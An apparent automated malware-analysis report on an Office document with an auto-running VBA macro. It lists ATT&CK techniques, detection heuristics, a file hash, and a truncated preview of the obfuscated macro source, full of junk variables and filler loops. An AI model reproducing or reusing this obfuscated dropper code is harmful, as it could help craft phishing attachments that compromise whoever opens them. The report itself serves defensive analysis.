Verdict: MALICIOUS
Risk Score: 170
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a Microsoft Office document containing a VBA macro. A 'Document_Open' macro is present and uses a Shell() call, indicating an attempt to execute external commands. This strongly suggests downloader or dropper functionality, where the macro's primary purpose is to fetch and execute a secondary payload. The Shell() call combined with the auto-execution of the 'Document_Open' macro are the critical indicators.
Heuristics (6)
- VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low) [OLE_VBA_ENVIRON]: Environ() call (env variable access)
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23650 bytes | ba6a0244f453dd7e5d5c09b89033c6ae545884e358b4be970a388835b16b2f69 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private snortsovertonessects(0 To 58) As Byte
Dim desertionsbicycleyachts As Long
Dim frighttwinkleinoculated As String
Dim cohabitationhumanitytreatises As Long
Private indeterminatedithersBlancas As Boolean
Dim underliningoversimplificationsElmers As Long
Private overproducingmouthfulsunknowing(0 To 930) As Byte
Private repackagingfluffinessstransliterate(0 To 912) As Byte
Function tinyscratchiestexpounding(auditoriaconversationalistspulps As String, undesirablemoodinesssGunther As Integer, privationslibcarryall As String) As String
Dim wellsswivelingseverances As String
Dim Todsbacchanalianscolonization As Integer
Dim timingsPortlandsholing As String
Dim yesteryearsAquinassmilled As Boolean
Dim chewergroinpigtails As Integer
Dim mountebanksmeagerlyreviewers As String
Dim enjoyscollierslibelling As String
Dim Heisenbergwitchingcolliers As Boolean
Dim SheratonsCamelotenhancements As Boolean
Dim nuisancesquadruplingordinarily As String
Dim damningKaylaArizonian As String
nuisancesquadruplingordinarily = anorexicszwiebacksflue(auditoriaconversationalistspulps, undesirablemoodinesssGunther)
Dim unhesitatinglydewdropspawls As Integer
unhesitatinglydewdropspawls = 934
Do While 7089 > unhesitatinglydewdropspawls
unhesitatinglydewdropspawls = unhesitatinglydewdropspawls + 23
Loop
damningKaylaArizonian = reconsideringovercastsponytail(undesirablemoodinesssGunther, privationslibcarryall)
Close #undesirablemoodinesssGunther
End Function
Function expoundingwolframMohican()
Dim pollinatesluminouslyballast As Boolean
pollinatesluminouslyballast = transmitterstruantsrating(grenadesongcrouchs)
End Function
Public Function pollinatesrechargesystematizing() As Integer
Dim reckonmadcapspresidents As String
Dim Thvideotapingunhesitating As String
Dim Aristophanesspresidentsskydivers As String
Dim greatnesseightyssubtotaled As Integer
Dim plaidtunnelingsmarginalias As Boolean
Dim dateresistorsdownloaded As String
Dim reconsideringinfertilitywhacking As String
Dim irritatesLevypelicans As String
Dim Juniorcrabbiestfreebooters As Boolean
Dim progressivessuburbanitesalutations As Boolean
Dim noondayshinyroundly As Integer
Dim terrainsyachtsKoran As Integer
Dim hideousnessconfidenceintrusted As String
Dim ferociouslyjoistsutter As Integer
ferociouslyjoistsutter = 1695
Do While 6552 > ferociouslyjoistsutter
ferociouslyjoistsutter = ferociouslyjoistsutter + 22
Loop
pollinatesrechargesystematizing = FreeFile
End Function
Public Function victualingSoutheySARS(liefconjoiningunisexs As String) As String
Dim thensRamirosbrainwashing As Integer
Dim bansheedeedfluoresce As String
Dim constructorsrevaluedgoo As String
Dim posersdomesticsmoratoriums As String
Dim fiddlejollysplausibly As Integer
Dim pollinateswearisomeexcitable As Integer
Dim dentistsgardenobtusest As Integer
Dim abbotochresGiselle As Integer
Dim biasesbombshellquestioned As String
Dim unknowingdetectingBaxter As String
Dim predisposesHardyLiszt As String
Dim cruciblesbulbousNirenberg As Boolean
Dim Josefserialsintoxicants As String
Dim appertainedunreachableascertain As Integer
Dim underwritelegionfealty As Integer
Dim embroideryshithertopredisposes As Integer
embroideryshithertopredisposes = 3185
Do While embroideryshithertopredisposes < 6577
embroideryshithertopredisposes = embroideryshithertopredisposes + 3
Loop
victualingSoutheySARS = Environ(liefconjoiningunisexs)
End Function
Public Function spellinghuhtoddlers(Mingussrobotfingernails As Integer, warrantyingAmerindsdeclared As String)
Dim falsettosfliesinlays As Integer
Dim sniggeringErasmusepidemics As String
Dim remarriesagreeablypealing As Boolean
Dim vetchfertilizersdragonflies As Integer
Dim Weldonsastrakhanported As Boolean
Dim polkaingHannibalstampede As I
... (truncated)
```